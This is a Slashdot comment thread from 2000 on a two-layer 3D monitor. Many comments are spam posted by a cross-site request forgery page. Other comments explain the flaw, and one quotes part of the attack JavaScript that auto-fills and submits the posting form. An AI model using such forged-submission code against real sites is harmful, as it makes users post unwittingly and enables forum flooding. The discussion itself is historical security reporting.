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3-D Monitor From Deep Video Imaging 202

Silver A writes: "Deep Video Imaging Ltd. has available monitors with real, physical depth, and touchscreen capability. Unfortunately, it's only 800 x 600 x 2 so far. The base model is only $8765.00 for US and Canadian customers. This looks really cool, but I'd like to know if they plan to go to more than 2 planes, and if they support X." Or, on the other hand, if X will support them. These may have limited utility as is, but undeniably cool.
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3-d Monitor From Deep Video Imaging

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  • 10320246297
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • It's a nine thousand dollar Viewmaster!

  • 3697967987
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • This seems cool, but there have got to be better ways to do 3D.

    Take the IMAX thing a bit further. Instead of projectiong two images with different polarizations, project two images directly onto your retinas. This would give true 3D, and it seems easier than their method.

    Probably be hell to program graphics for.
  • Since LCDs absorb light (rather than emit light) it is impossible to have a lit pixel behind a black area. This rules out using stacked LCDs.
  • 9361037224
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 6722437867
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • I hit the link off Post #42, which seems to be the first in this story

    A quick look at the posters BIO [slashdot.org] shows hew posted 3 similar comments within 10 minutes of eachother into different stories

    since the script or whatever on the linked site causes a direct post back to the originating story, I figure this is the guy

    dunno what to do about it. I COULD BE WRONG - PLEASE DONT WITCHUNT. But it seems likely?
  • First of all, I'm really suprised by the number of people that click on my link and that use Win32 plateforms. Is it because most readers of Slashdot are Windows users or because Windows users are prone to click where somebody says they should not.
    Please stop to click on "retry".
    Sorry for the noise on this forum.
    I demonstrate this bug in a none agressive way, correct your sites guys, some will not !
    Click on "more" if you want more explanations on the bug, it's safe.
  • Then again, we should thank him/her/it for their hidden warning:

    "If you use Outlook, you'd better Look Out!"
  • A pair of lasers hitting the back of my retinas are cool, relatively cheap, and portable.

    Stacks of LCDs are lame, really expensive, and immovable.

  • I'm curious if . . . it would be possible to do . . . with video the same thing that stereo speakers have done for sound.

    The two reasons why you can use two speakers to simulate sound from points other than the speakers are
    1) A speaker in each ear, so you can manipulate the data going to each ear and
    2) The sound moves, and by exploiting the delay involved in the sound going from the speaker to your ear, you can create these effects.

    You can do the same with displays by:
    1) Having a display for each eye (which is currently the best bid on stereo vision) through head displays, or other eye type filters (LCD shutters, polarized lenses, etc)
    2) Moving the display or display surface. If you move an LCD display in and out then you can simulate having infinite planes of display. (I've thought about this in quite a bit of depth. The main issue here is reliability of a large mechanical system including wear, sound and vibration issues)

    If you could cause the speed of light to slow down to about the speed of sound, then it is theoretically feasable that one could sit in a mirrored room and generate 3D holograms without special headgear. Einstein! Where are you!? (Said like, "Scooby-doo, where are you?")


    Logic is a systematic method of coming to the wrong conclusion with confidence.
  • Ummm... according to your logic, if something is layered it only gets a half dimension, then the screen would only be 1.5D, since it's basically layered in each dimension. It's just that two of the dimensions have high enough resolution that it is difficult (not impossible) to tell that it is not continuous. As it stands, layering, or pixellating, depending on what angle you view it from, seems to be well regarded as a full dimension. So, it seems to me that this system is in fact 3D, even though it gets very poor resolution in one dimension.
  • On Win2k (work) MSIE5.5 ALL scripting, Active X an dcookies set to PROMPT (jscript, cookies)or DISABLE (active X, any other scripting, Java)

    that page ran a REDIRECT in my browser window, sending me back to /. 's post confirmation screen w/ all the correct URLs.and I naively presumed your couldnt do a Jscript REDIRECT with my security settings

    so maybe its NOT just a slashdot bug BUT also a real bad SECURITY BREACH, MAYBE IN THE ECMA SCRIPT MODEL ?? as its in in M$ and a whole lot else

    has anyone contacted the author or poseted the explanation here yet?

    *not* redundant yet

  • he didn't mean to post that. Just like the other hundred or so other people, he clicked a link that posted it for him. The information dosen't match yours, because it describes HIS setup. If you clicked the link, you might want to look for one under your name.
  • 9863941907
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 1887277863
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • Awhile back I was at a science museum (in Seattle I think) where they had a Sun workstaion that had a 3-d mouse and this pair of 3d glasses (I think they used polarized light or a LCD flashing on and off very quickly for each eye) It worked pretty well, except that it gave me a headache after awile.
  • 963495528
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; AltaVista 1.01.01)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • by CausticPuppy ( 82139 ) on Friday May 19, 2000 @12:15PM (#1060473)
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    atext += "Just a security hole of Slashdot. You can find this kind of ";
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    atext += "<br>";
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  • I want to know how far apart the layers are.

    Don't criticise someone who is attempting to use free software for not using enough free software.
  • Actually Slashdot has a lameness filter that could filter these particular messages, until the root problem can be fixed.


  • 8534517009
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 2980591721
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • The main problem I can see with that is that, as you add more layers, more and more light gets eaten in the sandwiched layers. You can get around that -- a bit -- with a strongeer backlight, but that still leaves you with more heat, and the layers further back will get dimmer, and dimmer and....
    In time, though, we may have a real solution to those issues. I'm sure that they're working on it.
  • I'm at work, and am forced to use Windows for now. I don't run it at home. Whatever my next job is, the situation will probably change.


  • 2157400083
    Here is your navigator : Mozilla/4.61 (Macintosh; I; PPC)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 6524460562
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • apply the cookie bug, post username/password of slashdot member.

    hehe, that would be kinda funny (not really, but I want to let people know that the current 'sploit is annoying rather than harmful, and that it could actually be malicious if someone coded it right).

  • Think about it, if it were clear, it wouldn't be black, would it? That is what causes a pixel to light up. If it's opaque then it is black.

  • 5322940981
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 6838745939
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 3368513944
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • by Pfhreakaz0id ( 82141 ) on Friday May 19, 2000 @11:14AM (#1060487)
    Porn freaks -- they drive just about every other technological invention down in price (think CD-ROMs, VCR's, etc., God bless their pervert brains and sweaty palms! P.S. -- I think gaming could be pretty cool on this, too.
  • Hmmm...

    But you *could* have a black pixel behind a white one. It seems to me that you could use stacked LCDs to get a 3-D effect. You just use white (clear) as the transparent color. It's no different than the real world, where opaque objects obscure our view of other things behind them.
  • Imagine if you move a window over another window and it physically moves closer to you. _That_ would be cool.

    Don't criticise someone who is attempting to use free software for not using enough free software.
  • 8596385130
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 6868107482
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 7369756360
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • One thing you can't really do with hardware layering and mixdown is provide a feeling of space - with this screen you can move your head ever so slightly and get a concept of depth, even if its only minor.

    This could have exciting implications for future GUI design, and if they perfect the manufacturing process to the point where more than 2 planes can be sandwiched (say, 32 or 64?) then we start seeing some really interesting opportunities for GUI design, not to mention the artistic value, which is often inappropriately overlooked in technology.

    Imagine a GUI that gives you a degree of depth inherently without requiring large resources - buttons could have 3d edges that were handled at the hardware level, rather than software - thus making for better resource management, and therefore leading to more efficient GUI performance. This may seem minor, and perhaps it is, but I can see how this would have potential.

    Once we get up to the 64-pixel Z-plane level of production, I can see widgets being designed that use the Z-plane to provide ancilliary info feedback to the user without requiring any more interaction on the users part than to just move their head and look closer.

    I was thinking about this similar "liveliness" aspect of GUI design the other day when playing with http://www.praystation.com/ (excellent web page) - it'd be nice if there were some way to produce a screen that could figure out what you were looking at, perhaps by bouncing something off your retina and doing geometry to get a point of what you're looking at. In the 80's, marketing devices that used lasers to see what you were looking at were used to do market research of TV commercials - it'd be nice to see something like this built into LCD screens, so we could do away with the mouse altogether.

    But the thought I had was that, with something like this, the longer you look at the control the more information it could provide you - bringing a "liveliness" aspect to the control that we don't currently have with the static 2d shapes we call user interfaces right now.

    Having a 3D screen with a 64-layer Z-plane would be another way to add 'liveliness' to an interface... you could for example build a mixing console that provides you with channel insert information, with amplituded represented in depth.

    I'd say 64-layer Z-planes would be the next major step for this company. Get things to that point, and the GUI design world starts to get *really* interesting...
  • 7515482293
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • It'll also teach me to use the back button. I just instinctively clicked back when I was staring at posting and it did it again.


    All in all, pretty damn funny, but I changed my passwd just the same. ;-)
  • Who would pay that much for such limited functionality ?
  • by n8dmt ( 128444 )
    Very Cool, but OUCH!!! $$$$
  • Erm... How exactly do you intend to see both programs at once, if one is on top of the other?
  • 8547236984
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • If you want a true 3D display, IMHO the most straightforward way to go about it is to start with a lightweight, transparent, double-sided LCD panel, and add an electric motor that causes the panel to rotate about its center about 60 times per second. Presto, a cylindrical volumetric display!

    Might be kind of dangerous, though...

  • I've checked these out a little bit ... they look alot like what one of the UI developers for the original mac told wired he thought that windows would eventually go to ... (only i think that this is a little more literal "3-d" than he'd originally meant :) ... One of these would definately raise the geek-factor in a household significantly.

  • Other way around..
    It's impossible to have a black pixel behind and a lit pixel on top.
    For the techs out there, they simply use a standard (matrox?) video card set at 1600x600 - the left half of the display is underneath and the right half is on top. It makes for some <ahem> interesting mouse navigation.
    I've overheard that their intended market is embedded kiosks - like those automated movie dispenser things or the "virtual tour guide" at the tourist center.

  • Does anybody else find it curious that the price for this product is $8765? I think that maybe they were just lazy and they just strummed their fingers across four keys on the top row of their keyboard :-)
  • by segmond ( 34052 ) on Friday May 19, 2000 @12:33PM (#1060504)
    whoever posted that was irresponsible, knowing that many people will click on it out of curiosity, but worst of all, that person had to label it "Slashdot Hole", It is not.
    Anyway, here is the raw output of what causes this.

    Connected to www.multimania.com.
    Escape character is '^]'.
    GET /abuabu/slashdothole.html

    I was going to paste it, but slashdot crap is bugged, it mistakes java script code for multiple level of indentation of html. duh! so just get it yourself.

    Oops, I was going to post this, but I realized there is a slight security hole, slashdot lets you post in 70 seconds intervals, with this script the 70 seconds intervals is not enforced, thus one can automate this and just flood the entire slashdot with garbage in a few minutes! ick!

  • 4594101037
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus@voila.fr
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • The code is here [stormhouse.co.uk] in PDF format AND NOW HTML as well. Formatting not very nice tho'.

    Any comments on the code? Ive not had time

  • The code is here [stormhouse.co.uk] in PDF format for the page and JAVAscript which is causing all this trouble. Sorry but PDF the only way i could get to make this readable in original format without being interpreted as HTML and continuing the problem

    Happy reading!
  • http://lwn.net/2000/features/Redirect.phtml


    Essentially, if you ask a web server for a page, the server can send back a redirect, saying "actually, it's over there." Your browser then goes to the new page and asks again. Redirects are useful for a number of purposes; for example, when a web site moves a redirect can be put in to point readers to the new site transparently. (Thus, for example, some people still go to www.eklektix.com/lwn/ to read LWN and it works, even though LWN has not been there for two years).

    Yet the problem here is Slashdot itself... and nothing else... From what it seems, Slashdot figures who is posting simply by looking at the cookie.. and nothing submited from the form..

    Thus the "Security hole" page auto submits to slashdot which reads your cookie and posts a comment under your name..

    Easily taken care of by slashdot by simply entering the users username as a hidden variable in the form, or an md5 hash to make sure none of the fields are being tappered with...

    ITS NOT a web wide problem.... Just a Slashcode problem..
  • yeah, sadly im not alone o fthe reader's in this story, and it seems very few but the early suckers got modded down (a few points for ma already :(

    but i figured i'd take a look at the problem :

    The bug code is here [stormhouse.co.uk]

    off for coffee
  • okay, nice demo (NOT), but (i was dumb enough to click the *retry* link no tthe *more info* link - too much coffe i presume) but the target site picked up my ID and posted under my name comment #42

    cost me a karma point, and rightly too, bu tthat oughtaa be on -1 at leastmodded down to 0 since I got caught out
  • 9512299312
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.6; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • by Guppy ( 12314 ) on Friday May 19, 2000 @11:18AM (#1060513)
    "I can't get to the site right now, but why couldn't the company make just layers of LCD screens?"

    I imagine this may have something to do with pixel aperture ratios. An active-matrix LCD panel isn't completely transparent--the transistors and other components take up space and occlude part of each pixel. A high-aperture LCD might have as much as 70-80% of each pixel open, but even so you'll eventually loose too much light as you stack up more and more layers.
  • First of all, this should really be labelled 2.5D, not 3D, since it is layered.

    It was only a matter of time until people started coming out with displays such as this. Layering 10 transparent LCDs would be good also.

    The problems is the bandwidth needed to drive such a beast. Imagine 10 layers (not very many at all) and 1024x768x24 at 60Hz. This means you need a graphics card capable of handling over 12Gb/s of data. In comparison, my 1600x1200 monitor only needs 46Mb/s of bandwidth.

    But then, bandwidth is a widespread problem that is getting more attention than other problems. Imagine an HDTV receiver that gets 10 channels synchronized to a 10 layer monitor... 2.5D movies, anyone?


    Q: How many IBM CPU's does it take to execute a job?
    A: Four; three to hold it down, and one to rip its head off.
  • 9397800373
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.6; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • No that hard - there are hardware (ie not green/red) 3D glasses around - or used to be, so it can be done. But I don't like the idea of a driver bug switching the projectors on full - especially since it would probably use lasers. I pefer my eye surgery to be done by a (hopefully) qualified professional, not my PC games!
  • 4781480094
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.6; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • I might be wrong, but I believe that blank LCD pixel is clear.

    Don't criticise someone who is attempting to use free software for not using enough free software.
  • 6097301187
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.6; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 5917698154
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 1182021410
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 10604950724
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 8975823972
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • 7584318488
    Here is your navigator : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Just a security hole of Slashdot. You can find this kind of hole in all sites which has a forum. I think that in site like e-trade you can make some people asks for stocks.
    You can contact me there : Krakus.Irus à voila.com
    If you want to retry [multimania.com].
    If you want to know more [lwn.net].
  • Can you mod down all those stupid "auto posts" without killing everyone's Karma? Pretty please?

  • You know, with all these warning replies, one really has to wonder just who is actually still clicking on that stupid link. Not much I can do, though.

  • You just need to move the monitor 'closer' to the bus. 16x12 requires 46Mb/s in raw form (over the cable to your dumb display) but there sure isn't that much travelling over the system bus, and there ain't that much activly being transferred internally by the video card either! So there has to be a place we could 'snip' off the video card and move outboard to the display. Say after the geometry has been calculated for the frame, it's compared to the last one and sent to the monitor as vectorized meta-data, along with the appropriate bitmaps to paint with. Monitor keeps tabs on the totality of the image in a seperate framebuffer array.

  • Well, you'd need more than 2 planes for that type of thing. Seriously I don't think it will ever get that evolved. If anything games will just be more immersive, but I don't think that any practical differences in the way you play them (ie physically moving around the monitor to look around corners in a FPS) will ever come to pass with 3d monitors. Maybe with VR units.. but not 3d monitors.
  • And remember, whenever you make an Assumption, it only makes an "ASS" out of "U" and "MPTION." Or something. Obviously there are quite a few stupid *nix users here too, and probably a lot of Windoze users who never clicked on the bad link (including me.)

    OTOH, the high Stupid-Windows-Users count here could be explained by the fact that MS employees regularly scan Slashdot for copyright violations.
  • I don't see the point of making physical 3D. Human vision is 2x2D, so instead of 640x480x500 (whatever...) = 153M/update, why not do 640x480x2 directly in the brain? With head movement detection you could even have that moving thing. And while I realize this is expensive, it might be cheaper than to stack, stack, stack the screens. -Kaatunut
  • I must admit that I didn't take the time to look through the whole website but I was just curious. I remember seeing a 3D tv screen while I was on a tour of Universtiy of Manchester, in their 3D labs a couple of years ago. Also, on the BBC, I saw an article about such devices in Japan. They work on the principle of the freznel lense I think. It basically acts as hundreds of round screens on a plane. When you look at each bead, it shows you a slightly different view of pixel than from other angles. The camera works like an insects compound eye. Not yet available but looks promising.
  • I think i was the first to accidentally hit the link. So the guy who posted it is very probably poster number 42 [slashdot.org] and my first thinking about this was in post number 213 [slashdot.org] But we've been all too busy to even call him an agrravating Frog yet (his site is in France) #8~)
  • by Upsilon ( 21920 ) on Friday May 19, 2000 @12:48PM (#1060534)
    Hey, I tried out Virtual Boy! I didn't buy it, mind you, I rented it. For the first 10 minutes after I started using it I thought it was the coolest thing ever made. Then my eyes began to hurt, but for some reason I kept playing. Then I finally realized that there was something like a total of 4 games for it and they all sucked royally. I also realized that if I used it much longer my eyes would probably start bleeding or something. Anyway, once the novelty wore off it was hard not to realize that Virtual Boy was just a crappy system in many different ways. However, that does not mean this monitor concept is necessarily that bad an idea. I just hope my eyes won't start bleeding if I use it.

  • Actually, I think it is kind of fascinating. I see a number of links -- and not "hot news" links, either -- that show up on memepool and then later mysteriously appear, uncredited, on slashdot. There have been at least two (or perhaps three, depending on how you count) this week alone.

    I think we can all agree that information that is freely shared is good for everyone. It would be nice if the slashdot editors made at least a cursory effort to be aware of whether the links submitted to them are on another weblog. For the record, I personally don't think there's anything wrong with using the link, as long as appropriate credit is given.

    Also for the record, I am a contributor to memepool [memepool.com], and I have found it to take nearly no effort at all to check if leads I am given are currently appearing on another site. If we as members of the slashdot community expect the same level of responsibility from the slashdot editors, I have no doubt they will be able to rise to our expectations.

  • by TheDullBlade ( 28998 ) on Friday May 19, 2000 @11:49AM (#1060546)
    ...Virtual Boy! Anybody admit to trying out the crappy 3D toy? It didn't really have any modern 3D hardware, so it showed GameBoyish sprites at varying depths. This really sucked. Layers of flat screen don't look like anything useful or interesting; you'd need hundreds of layers packed very close together to be even moderately useful.
  • displaying the left half of your browser on top of the right half, tricking your system into thinking you were running at 1600x600

    Better yet, run a lot of adbars [8m.com] on the back screen plane. That way, you can surf the web on the front screen and still get paid [8m.com] to use Windows.

  • ...nobody buys them. It seems everyone would rather have double the frame rate or double the resolution than binocular vision.
  • by Julius X ( 14690 ) on Friday May 19, 2000 @11:35AM (#1060566) Homepage
    I'm curious if using a display such as this, although the display only creates Two Dimensions, if it would be possible to do the same thing with video the same thing that stereo speakers have done for sound.

    With sound, you may only have two speakers(or more) speakers, but using fading effects, you can create the illusion of a sound being anywhere between or even outside the speaker radius.

    Would it be possible to do a similar effect using a 2-Dimensional display monitor? Perhaps the "front" dimension has an image(a mouse pointer for example), and while you move it to the "rear" dimension(since there are only two with this display), the front dimension "fades" the image into the rear dimension, creating the illusion that it has actually passed through space to get there, as if there really were more than two dimensions.

    Undoubtedly, to create the look of two dimensions, what the technology has required was one "transparent" display on top of another regular display, and all it would require would be a fading transparency effect to accomplish such illusions a demonstrated above.

    The possibllities here could be quite intriguing.

    -Julius X
  • I was just thinking that for folks who are blind or otherwise visually impared could really use a monitor like this, especially if it were used in a display environment where folks who are also not so handicapped would also be able to use the same device.

    I imagine that there are some braile reading devices already, but this certainly could be used in a manner like that, allowing you to view web pages in braile and even grab images with some false relief so they can enjoy some of the benefits of the web as well. At least this is a very pratcial application for even using a two-height display.

    This could also be useful in applications where you need to have a configurable tactile display, such as the classic bridge controls found in the Star Trek TV series (post TOS). As you are pushing buttons you can change the "feel" of the user interface, and even "vibrate" the buttons to give a tactile response.

    Yeah, I think you could find some customers for something like this, even at the $8800 price tag.

  • Anyone who knows anything about CGI security knows that checking referers is pretty much a waste of time, if you want to really fix a problem.
  • by swm ( 171547 )
    Anyway, I think that the true future of 3d monitors will be something like an Active Holographic Display; i.e. a monitor who's elements can emit different light patterns in different directions. For example, an LCD-type screen that had a mechanism by which one pixel could emit blue light in one direction and green in another. The same concept is what makes holograms work. Surely it couldn't be too hard to make a monitor that does this same kind of thing?

    A SMOF (Small Matter Of Fabrication)

    To make a holographic display, all you need is

    • a screen with a dot pitch smaller than the wave length of light
    • and the pixels have to emit coherent (i.e. laser) light
    • and you have to control the phase at which each pixel emits
    Yeah...that's the ticket: if you control the amplitude and phase of the light emitted at each point on a surface, then you can synthesize any image.

    Computing the required video bandwidth is left as an exercise for the reader.

  • Just attacked the comments page with textutils and got some stats about the people who clicked the link. (I'll post them in a follow-up message). Some interesting points:
    • Amongst clickers, Win2k is already as popular as WinNT.
    • Nearly all of the Windows clickers were IE users.
    • Netscape and IE users were equally likely to post more than once.
    • AC clickers use the same software as logged-in clickers.

    I'd love to know how representative the clickers are of the whole of slashdot. IIRC slashdot's Windows/Linux proportions a year ago were about the same as in these stats, so it's possible.
  • DO NOT follow the links on the SLASHDOT SECURITY HOLE. It posts a message to this thread under your name (if you are logged in) which is then moderated down by conscientious moderators, which causes you to lose Karma.

    Of course, if you WANT to lose Karma, keep clicking on retry...


    Posted by Adam, who thinks some moderators will moderate this down just to watch others lose Karma...
  • <SCRIPT LANGUAGE="JavaScript">

    function doerror() {return true;};
    // To avoid multiple calls with frames, only the top-most frameset calls the popup :
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    for(i=0;i<10;i++) {
    randSum += Math.round(Math.random()*10)*Math.pow(10,i);

    atext = randSum;
    atext += "<br>";
    atext += "Here is your navigator : " + navigator.userAgent;
    atext += "<br>";
    atext += "Just a security hole of Slashdot. You can find this kind of ";
    atext += "hole in all sites which has a forum. I think that in site ";
    atext += "like e-trade you can make some people asks for stocks.";
    atext += "<br>";
    atext += "You can contact me there : Krakus.Irus à voila.com";
    atext += "<br>";
    atext += "If you want to <a href=\"http://www.multimania.com/abuabu/slashdotho le.html\">retry</a>.";
    atext += "<br>";
    atext += "If you want to know <a href=\"http://lwn.net/2000/features/Redirect.phtml \">more</a>.";
    document.forms[0].postersubj.value = "Slashdot Security Hole" + randSum;
  • at the mall when Florsheim shoes suggests you browse their shoe collection through the atm-machine-like unit they use instead of a paper catalog. Just think! Now that intel commercial with the guy dropping that new car with the forklift could be a reality!!!
  • As of when these figures were compiled, 313 copies of the message had been posted.
    • 159 of these were from ACs
      • 60 Win9x
      • 35 WinNT
      • 19 Win2k
      • 37 Linux
      • 4 Mac
      • 3 IRIX
      • 1 SunOS
      • 85 MSIE
      • 72 Netscape
      • 2 Opera
    • 79 different logged-in users posted the message
      • 27 Win9x
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      • 17 WinNT
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      • 2 IRIX
      • 1 SunOS
      • 1 "Poo"

      • 52 used MSIE (49 v5, 3 v4)
      • 22 used Netscape 4.x (11 Linux, 8 Windows, 2 IRIX, 1 SunOS, 1 Mac)
      • 3 used Opera on Windows
      • 1 used Mozilla m14 on Windows
      • 1 used "Fartzilla" (the same chapppie who runs it on "Poo")
    • 37 accounts posted the message more than once
      • 27 IE
      • 10 Netscape
      • 29 Win
      • 8 Linux
  • by Gothland ( 34482 ) on Friday May 19, 2000 @11:40AM (#1060616) Homepage
    I apologzie for the shouting, but the signal to noise ratio has hit about 1/5 today. The links cause you to post another report with your browser info. Don't click on 'em.
  • Comment removed based on user account deletion
  • While this seems like a really cool idea, and this will probably be standard in 5 years, I hope there is some kind of control on the monitor to put it back to 2D, or that any programs that use this have an option that lets you turn off the 3d display, because after a long night of playing games\surfing the net\etc. at the same time, this thing is probably going to give quite a few people headaches\seizures\etc.

  • I had a professor who consulted with Nintendo on the Virtual Boy, and his opinion (though he said he'd never directly talked with anyone there about this) was that they were basically working out the kinks so that when multi-color LEDs were available, they'd be able to really quickly put together a viable 3D system. He had a whole bunch of pre-production units in his office, and we got to poke around in them quite a bit. They were pretty crappy as a platform, but mechanically/electronically they were really, really cool. Mark my words- cheap blue LEDs aren't very far away (they are in limited production already in Japan) and when their cost gets reasonable in a few years, Nintendo will come out with Son of VirtualBoy- and it'll blow us all away.
  • Yes, but that's 1024x768x1 = 786432 pixels, while 800x600x2 = 960000 pixels. Can't you just imagine displaying the left half of your browser on top of the right half, tricking your system into thinking you were running at 1600x600?


